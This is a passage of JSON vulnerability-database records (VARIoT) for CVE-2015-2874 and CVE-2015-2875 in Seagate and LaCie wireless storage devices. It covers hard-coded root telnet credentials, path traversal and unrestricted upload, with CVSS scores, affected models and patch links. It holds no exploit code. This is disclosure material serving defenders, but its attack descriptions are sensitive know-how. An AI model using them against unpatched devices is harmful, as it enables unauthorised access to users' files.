          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#903500",
            "trust": 3.6
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2874",
            "trust": 2.8
          },
          {
            "db": "JVN",
            "id": "JVNVU92833570",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-207",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "76547",
            "trust": 0.3
          },
          {
            "db": "PACKETSTORM",
            "id": "134986",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-80835",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80835"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2874"
          }
        ]
      },
      "id": "VAR-201512-0524",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-80835"
          }
        ],
        "trust": 0.01
      },
      "last_update_date": "2025-04-13T20:55:01.391000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Firmware Updates for Seagate Products",
            "trust": 0.8,
            "url": "http://knowledge.seagate.com/articles/en_US/FAQ/207931en"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-255",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-Other",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-22",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-80835"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2874"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://www.kb.cert.org/vuls/id/903500"
          },
          {
            "trust": 2.5,
            "url": "https://www.kb.cert.org/vuls/id/gwan-9zgtuh"
          },
          {
            "trust": 2.5,
            "url": "https://www.kb.cert.org/vuls/id/gwan-a26l3f"
          },
          {
            "trust": 1.4,
            "url": "https://apps1.seagate.com/downloads/request.html"
          },
          {
            "trust": 1.4,
            "url": "http://knowledge.seagate.com/articles/en_us/faq/207931en"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/425.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/434.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/798.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2874"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2875"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2876"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu92833570/index.html"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2874"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2875"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2876"
          },
          {
            "trust": 0.3,
            "url": "http://www.seagate.com/in/en/"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80835"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2874"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80835"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2874"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-09-01T00:00:00",
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "date": "2015-12-31T00:00:00",
            "db": "VULHUB",
            "id": "VHN-80835"
          },
          {
            "date": "2015-09-01T00:00:00",
            "db": "BID",
            "id": "76547"
          },
          {
            "date": "2015-12-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "date": "2015-09-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          },
          {
            "date": "2015-12-31T05:59:02.673000",
            "db": "NVD",
            "id": "CVE-2015-2874"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-12-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "date": "2015-12-31T00:00:00",
            "db": "VULHUB",
            "id": "VHN-80835"
          },
          {
            "date": "2015-09-01T00:00:00",
            "db": "BID",
            "id": "76547"
          },
          {
            "date": "2016-01-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "date": "2016-01-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2015-2874"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate and LaCie wireless storage products contain multiple vulnerabilities",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "trust management",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-207"
          }
        ],
        "trust": 0.6
      }
    }

    VAR-201512-0525

    Vulnerability from variot - Updated: 2025-04-13 19:46

    Absolute path traversal vulnerability on Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 allows remote attackers to read arbitrary files via a full pathname in a download request during a Wi-Fi session. There are multiple vulnerabilities in the wireless storage products offered by Seagate. Hard-coded authentication information (password) (CWE-798) - CVE-2015-2874: A telnet service that is not described in the manual is running and is accessible with the username "root" and the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html The National Vulnerability Database (NVD) publishes this issue as CWE-255. Direct request (Forced Browsing) (CWE-425) - CVE-2015-2875: By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request ('Forced Browsing') https://cwe.mitre.org/data/definitions/425.html The National Vulnerability Database (NVD) publishes this issue as CWE-22. Unrestricted upload of dangerous file types (CWE-434) - CVE-2015-2876: When accessing the device wirelessly with default settings, files can be uploaded to the /media/sda2 file system. This file system is reserved for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.html A remote attacker can access arbitrary files on the product, and the product may be operated with root privileges. Seagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable.


    {
      "@context": {
        "@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
        "affected_products": {
          "@id": "https://www.variotdbs.pl/ref/affected_products"
        },
        "configurations": {
          "@id": "https://www.variotdbs.pl/ref/configurations"
        },
        "credits": {
          "@id": "https://www.variotdbs.pl/ref/credits"
        },
        "cvss": {
          "@id": "https://www.variotdbs.pl/ref/cvss/"
        },
        "description": {
          "@id": "https://www.variotdbs.pl/ref/description/"
        },
        "exploit_availability": {
          "@id": "https://www.variotdbs.pl/ref/exploit_availability/"
        },
        "external_ids": {
          "@id": "https://www.variotdbs.pl/ref/external_ids/"
        },
        "iot": {
          "@id": "https://www.variotdbs.pl/ref/iot/"
        },
        "iot_taxonomy": {
          "@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
        },
        "patch": {
          "@id": "https://www.variotdbs.pl/ref/patch/"
        },
        "problemtype_data": {
          "@id": "https://www.variotdbs.pl/ref/problemtype_data/"
        },
        "references": {
          "@id": "https://www.variotdbs.pl/ref/references/"
        },
        "sources": {
          "@id": "https://www.variotdbs.pl/ref/sources/"
        },
        "sources_release_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_release_date/"
        },
        "sources_update_date": {
          "@id": "https://www.variotdbs.pl/ref/sources_update_date/"
        },
        "threat_type": {
          "@id": "https://www.variotdbs.pl/ref/threat_type/"
        },
        "title": {
          "@id": "https://www.variotdbs.pl/ref/title/"
        },
        "type": {
          "@id": "https://www.variotdbs.pl/ref/type/"
        }
      },
      "@id": "https://www.variotdbs.pl/vuln/VAR-201512-0525",
      "affected_products": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/affected_products#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "model": "wireless mobile storage",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
          },
          {
            "model": "goflex sattelite",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
          },
          {
            "model": "wireless plus mobile storage",
            "scope": "eq",
            "trust": 1.0,
            "vendor": "seagate",
            "version": "*"
          },
          {
            "model": "lac9000436u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "lacie",
            "version": "2.3.0.014"
          },
          {
            "model": "lac9000464u",
            "scope": "lte",
            "trust": 1.0,
            "vendor": "lacie",
            "version": "2.3.0.014"
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": null,
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "fuel",
            "scope": null,
            "trust": 0.8,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": "goflex satellite",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "wireless mobile storage",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "wireless plus mobile storage",
            "scope": null,
            "trust": 0.8,
            "vendor": "seagate",
            "version": null
          },
          {
            "model": "lac9000464u",
            "scope": null,
            "trust": 0.6,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": "lac9000436u",
            "scope": null,
            "trust": 0.6,
            "vendor": "lacie",
            "version": null
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "2.3.0.014"
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "2.2.0.005"
          },
          {
            "model": "technology llc seagate 36c",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "seagate",
            "version": "3.4.1.105"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2875"
          }
        ]
      },
      "configurations": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/configurations#",
          "children": {
            "@container": "@list"
          },
          "cpe_match": {
            "@container": "@list"
          },
          "data": {
            "@container": "@list"
          },
          "nodes": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "CVE_data_version": "4.0",
            "nodes": [
              {
                "cpe_match": [
                  {
                    "cpe22Uri": "cpe:/h:lacie:lacie_fuel",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:goflex_sattelite",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:wireless_mobile_storage",
                    "vulnerable": true
                  },
                  {
                    "cpe22Uri": "cpe:/h:seagate:wireless_plus_mobile_storage",
                    "vulnerable": true
                  }
                ],
                "operator": "OR"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Mike Baucom, Allen Harper, and J. Rach of Tangible Security",
        "sources": [
          {
            "db": "BID",
            "id": "76547"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2015-2875",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
          },
          "cvssV3": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
          },
          "severity": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/cvss/severity#"
            },
            "@id": "https://www.variotdbs.pl/ref/cvss/severity"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            },
            "@id": "https://www.variotdbs.pl/ref/sources"
          }
        },
        "data": [
          {
            "cvssV2": [
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "CVE-2015-2875",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 1.0,
                "vectorString": "AV:N/AC:L/Au:N/C:C/I:N/A:N",
                "version": "2.0"
              },
              {
                "acInsufInfo": null,
                "accessComplexity": "Low",
                "accessVector": "Network",
                "authentication": "Single",
                "author": "IPA",
                "availabilityImpact": "Complete",
                "baseScore": 9.0,
                "confidentialityImpact": "Complete",
                "exploitabilityScore": null,
                "id": "JVNDB-2015-006526",
                "impactScore": null,
                "integrityImpact": "Complete",
                "obtainAllPrivilege": null,
                "obtainOtherPrivilege": null,
                "obtainUserPrivilege": null,
                "severity": "High",
                "trust": 0.8,
                "userInteractionRequired": null,
                "vectorString": "AV:N/AC:L/Au:S/C:C/I:C/A:C",
                "version": "2.0"
              },
              {
                "accessComplexity": "LOW",
                "accessVector": "NETWORK",
                "authentication": "NONE",
                "author": "VULHUB",
                "availabilityImpact": "NONE",
                "baseScore": 7.8,
                "confidentialityImpact": "COMPLETE",
                "exploitabilityScore": 10.0,
                "id": "VHN-80836",
                "impactScore": 6.9,
                "integrityImpact": "NONE",
                "severity": "HIGH",
                "trust": 0.1,
                "vectorString": "AV:N/AC:L/AU:N/C:C/I:N/A:N",
                "version": "2.0"
              }
            ],
            "cvssV3": [
              {
                "attackComplexity": "LOW",
                "attackVector": "NETWORK",
                "author": "nvd@nist.gov",
                "availabilityImpact": "NONE",
                "baseScore": 7.5,
                "baseSeverity": "HIGH",
                "confidentialityImpact": "HIGH",
                "exploitabilityScore": 3.9,
                "id": "CVE-2015-2875",
                "impactScore": 3.6,
                "integrityImpact": "NONE",
                "privilegesRequired": "NONE",
                "scope": "UNCHANGED",
                "trust": 1.0,
                "userInteraction": "NONE",
                "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
                "version": "3.0"
              }
            ],
            "severity": [
              {
                "author": "nvd@nist.gov",
                "id": "CVE-2015-2875",
                "trust": 1.0,
                "value": "HIGH"
              },
              {
                "author": "IPA",
                "id": "JVNDB-2015-006526",
                "trust": 0.8,
                "value": "High"
              },
              {
                "author": "CNNVD",
                "id": "CNNVD-201509-208",
                "trust": 0.6,
                "value": "HIGH"
              },
              {
                "author": "VULHUB",
                "id": "VHN-80836",
                "trust": 0.1,
                "value": "HIGH"
              }
            ]
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-80836"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2875"
          }
        ]
      },
      "description": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/description#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Absolute path traversal vulnerability on Seagate GoFlex Satellite, Seagate Wireless Mobile Storage, Seagate Wireless Plus Mobile Storage, and LaCie FUEL devices with firmware before 3.4.1.105 allows remote attackers to read arbitrary files via a full pathname in a download request during a Wi-Fi session. Seagate There are multiple vulnerabilities in the wireless storage products offered by. Authentication information ( password ) Is hard-coded (CWE-798) - CVE-2015-2874 Not described in manual telnet Service is up and username \"root\" , Accessible using the default password. CWE-798: Use of Hard-coded Credentials https://cwe.mitre.org/data/definitions/798.html In addition, National Vulnerability Database (NVD) Then CWE-255 It is published as Send request directly (Forced Browsing) (CWE-425) - CVE-2015-2875 By default, anyone can download files when accessing the device wirelessly. Any file on the file system can be downloaded directly. CWE-425: Direct Request (\u0027Forced Browsing\u0027) https://cwe.mitre.org/data/definitions/425.html In addition, National Vulnerability Database (NVD) Then CWE-22 It is published as Unlimited upload of dangerous types of files (CWE-434) - CVE-2015-2876 When accessing the device wirelessly with default settings, /media/sda2 You can upload files to the file system. This file system is prepared for file sharing. CWE-434: Unrestricted Upload of File with Dangerous Type https://cwe.mitre.org/data/definitions/434.htmlA remote attacker can access arbitrary files on the product, root It may be operated with authority. \nSeagate 36C running firmware versions 2.2.0.005 and 2.3.0.014 are vulnerable",
        "sources": [
          {
            "db": "NVD",
            "id": "CVE-2015-2875"
          },
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80836"
          }
        ],
        "trust": 2.7
      },
      "external_ids": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/external_ids#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "db": "CERT/CC",
            "id": "VU#903500",
            "trust": 3.6
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2875",
            "trust": 2.9
          },
          {
            "db": "JVN",
            "id": "JVNVU92833570",
            "trust": 0.8
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526",
            "trust": 0.8
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208",
            "trust": 0.7
          },
          {
            "db": "BID",
            "id": "76547",
            "trust": 0.3
          },
          {
            "db": "OTHER",
            "id": "NONE",
            "trust": 0.1
          },
          {
            "db": "VULHUB",
            "id": "VHN-80836",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80836"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2875"
          }
        ]
      },
      "id": "VAR-201512-0525",
      "iot": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": true,
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "VULHUB",
            "id": "VHN-80836"
          }
        ],
        "trust": 0.02
      },
      "iot_taxonomy": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "category": [
              "home \u0026 office device"
            ],
            "sub_category": "storage device",
            "trust": 0.1
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          }
        ]
      },
      "last_update_date": "2025-04-13T19:46:32.152000Z",
      "patch": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/patch#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "title": "Firmware Updates for Seagate Products",
            "trust": 0.8,
            "url": "http://knowledge.seagate.com/articles/en_US/FAQ/207931en"
          },
          {
            "title": "Multiple Seagate Fixes for wireless storage product path traversal vulnerabilities",
            "trust": 0.6,
            "url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=57745"
          }
        ],
        "sources": [
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          }
        ]
      },
      "problemtype_data": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "problemtype": "CWE-22",
            "trust": 1.9
          },
          {
            "problemtype": "CWE-Other",
            "trust": 0.8
          },
          {
            "problemtype": "CWE-255",
            "trust": 0.8
          }
        ],
        "sources": [
          {
            "db": "VULHUB",
            "id": "VHN-80836"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2875"
          }
        ]
      },
      "references": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/references#",
          "data": {
            "@container": "@list"
          },
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": [
          {
            "trust": 2.8,
            "url": "https://www.kb.cert.org/vuls/id/903500"
          },
          {
            "trust": 2.5,
            "url": "https://www.kb.cert.org/vuls/id/gwan-9zgtuh"
          },
          {
            "trust": 1.9,
            "url": "https://www.kb.cert.org/vuls/id/gwan-a26l3f"
          },
          {
            "trust": 1.4,
            "url": "https://apps1.seagate.com/downloads/request.html"
          },
          {
            "trust": 1.4,
            "url": "http://knowledge.seagate.com/articles/en_us/faq/207931en"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/425.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/434.html"
          },
          {
            "trust": 0.8,
            "url": "http://cwe.mitre.org/data/definitions/798.html"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2874"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2875"
          },
          {
            "trust": 0.8,
            "url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-2876"
          },
          {
            "trust": 0.8,
            "url": "http://jvn.jp/vu/jvnvu92833570/index.html"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2874"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2875"
          },
          {
            "trust": 0.8,
            "url": "https://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2015-2876"
          },
          {
            "trust": 0.3,
            "url": "http://www.seagate.com/in/en/"
          },
          {
            "trust": 0.1,
            "url": "https://ieeexplore.ieee.org/abstract/document/10769424"
          }
        ],
        "sources": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80836"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2875"
          }
        ]
      },
      "sources": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "db": "OTHER",
            "id": null
          },
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "db": "VULHUB",
            "id": "VHN-80836"
          },
          {
            "db": "BID",
            "id": "76547"
          },
          {
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          },
          {
            "db": "NVD",
            "id": "CVE-2015-2875"
          }
        ]
      },
      "sources_release_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-09-01T00:00:00",
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "date": "2015-12-31T00:00:00",
            "db": "VULHUB",
            "id": "VHN-80836"
          },
          {
            "date": "2015-09-01T00:00:00",
            "db": "BID",
            "id": "76547"
          },
          {
            "date": "2015-12-28T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "date": "2015-09-17T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          },
          {
            "date": "2015-12-31T05:59:03.720000",
            "db": "NVD",
            "id": "CVE-2015-2875"
          }
        ]
      },
      "sources_update_date": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
          "data": {
            "@container": "@list"
          }
        },
        "data": [
          {
            "date": "2015-12-08T00:00:00",
            "db": "CERT/CC",
            "id": "VU#903500"
          },
          {
            "date": "2015-12-31T00:00:00",
            "db": "VULHUB",
            "id": "VHN-80836"
          },
          {
            "date": "2015-09-01T00:00:00",
            "db": "BID",
            "id": "76547"
          },
          {
            "date": "2016-01-14T00:00:00",
            "db": "JVNDB",
            "id": "JVNDB-2015-006526"
          },
          {
            "date": "2016-01-04T00:00:00",
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          },
          {
            "date": "2025-04-12T10:46:40.837000",
            "db": "NVD",
            "id": "CVE-2015-2875"
          }
        ]
      },
      "threat_type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/threat_type#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "remote",
        "sources": [
          {
            "db": "CNNVD",
            "id": "CNNVD-201509-208"
          }
        ],
        "trust": 0.6
      },
      "title": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/title#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "Seagate and LaCie wireless storage products contain multiple vulnerabilities",
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#903500"
          }
        ],
        "trust": 0.8
      },
      "type": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/type#",
          "sources": {
